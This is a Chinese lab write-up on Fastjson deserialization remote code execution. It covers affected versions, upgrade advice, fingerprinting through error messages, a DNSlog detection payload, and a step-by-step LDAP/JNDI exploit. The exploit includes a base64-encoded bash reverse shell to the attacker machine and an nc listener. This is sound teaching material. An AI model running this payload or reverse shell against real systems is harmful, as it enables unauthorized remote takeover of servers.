Fastjson反序列化漏洞

预备知识
①  概述
Fastjson是阿里巴巴公司开源的一款json解析器，它可以解析 JSON 格式的字符串，支持将 Java Bean 序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到 JavaBean。

②  漏洞信息
fastjson 1.2.24 反序列化导致任意命令执行漏洞：fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链。影响版本fastjson <= 1.2.24。

Fastjson 1.2.47 远程命令执行漏洞：fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。影响版本fastjson <1.2.48。

③  漏洞修复
fastjson 的最新版本为 1.2.58

建议广大用户对自身的业务/产品进行组件自查，确认 fastjson 版本至少升级到 1.2.58。

同时确认自身服务的 Java 环境版本，低于8u121 7u13 6u141 的用户也请及时升级环境版本，以防受到其他严重漏洞影响。

④  jndi注入
https://blog.csdn.net/he_and/article/details/105586691

实验目的
通过该实验了解漏洞产生的原因，掌握基本的漏洞利用及使用方法，并能给出加固方案。

实验环境
靶机：Centos7+docker+fastjson1.2.25   IP地址：10.1.1.119:8080

攻击机：Kali  IP地址：10.1.1.148

利用工具请在实验机内下载使用：http://tools.hetianlab.com/tools/fastjsonRCE.zip 

实验步骤一
近年来，Fastjson反序列化漏洞比较热门，作为一个刚入门的小白，你也想认识一下这个漏洞。我们这里通过ldap+jndi注入的方式实现RCE，步骤分为三步：

①   认识json数据格式及识别Fastjson组件
②   漏洞发现
③   漏洞利用

任务描述：认识json数据格式及识别Fastjson组件

前面说了，它是一款json解析器，所以以json格式传输的数据都有可能使用了Fastjson来进行解析，那么什么是json格式的数据呢？比如这种：

以及这种：

或者是这种（post data里的内容）：

访问试验机：http://ip:port，即可看到一个json对象被返回

抓包，右键选择change request method我们将content-type修改为application/json后可向其POST新的JSON对象，后端会利用fastjson进行解析。

那么如何去识别网站是否使用了Fastjson组件呢？

这里可以使用原始报错回显，如果站点有原始报错回显，可以用不闭合花括号的方式进行报错回显，报错中往往会有fastjson的字样。

输入：{"name":"

可以看到报错中包含了fastjson的字段。

实验步骤二
任务描述：漏洞发现（利用dnslog来进行辅助漏洞发现，需要在外网中才能使用，因为实验处于内网，所以该步骤仅作演示）

①  首先从dnslog获取一个域名，常用的dnslog有：http://www.dnslog.cn/，https://dnslog.io/，http://ceye.io/

②  然后执行检测poc：
{"name":{"@type":"java.net.InetAddress","val":"example.com"}}

原理是 java.net.InetAddress 这个类在实例化时会尝试对 example.com 做域名解析，这时候可以通过 dns log 的方式得知漏洞是否存在了。


实验步骤三
任务描述：漏洞利用（反弹shell）

前面讲了在外网中发现漏洞，那么如果在内网中我们可以使用盲打的方式，意思就是看到它使用了fastjson我们直接对其进行利用，我们这里通过ldap+jndi注入的方式实现RCE，基于ldap的利用方式：适用jdk版本：JDK 11.0.1、8u191、7u201、6u211之前。下载利用工具：

http://tools.hetianlab.com/tools/fastjsonRCE.zip

解压后进入到文件夹里，执行
java -cp fastjson_tool.jar fastjson.HLDAPServer ip port"要执行的命令"

注：该命令会在本地port端口上启动一个ldap服务器，ip为本机IP，并指定加载远程类，如果是反弹shell的命令，需要将其进行编码，管道符、输入输出重定向，只有在bash环境下才能用。而在这里，我们使用的是java为我们提供的命令执行环境，不支持管道符、输入输出重定向等。因此需要base64编码一下。

编码地址：http://www.jackson-t.ca/runtime-exec-payloads.html

这里使用python将反弹shell的命令进行base64编码

然后执行命令启动ldap服务器（注意，base64编码的反弹shell命令替换到花括号里echo,后面）

java -cp fastjson_tool.jar fastjson.HLDAPServer 10.1.1.148 1234 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEuMS4xNDgvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}"

启动后会自动生成payload

利用nc监听一个端口，该端口为反弹shell的接收端口

将生成的payload复制到burpsuite然后执行，修改请求类型为POST，修改 Content-Type 为 application/json 

可以看到nc监听的端口成功接收到了一个shell